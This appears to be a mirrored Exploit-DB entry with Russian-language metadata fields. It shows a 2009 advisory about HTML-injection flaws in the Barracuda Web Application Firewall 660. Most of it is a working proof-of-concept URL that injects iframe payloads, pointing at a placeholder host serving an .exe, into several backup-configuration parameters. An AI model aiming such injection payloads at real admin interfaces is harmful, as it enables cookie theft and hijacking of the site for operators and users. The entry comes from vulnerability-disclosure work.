- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 33423
- Проверка EDB
-
- Пройдено
- Автор
- GLOBAL-EVOLUTION
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- N/A
- Дата публикации
- 2009-12-19
Код:
source: https://www.securityfocus.com/bid/37432/info
The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US- Источник
- www.exploit-db.com
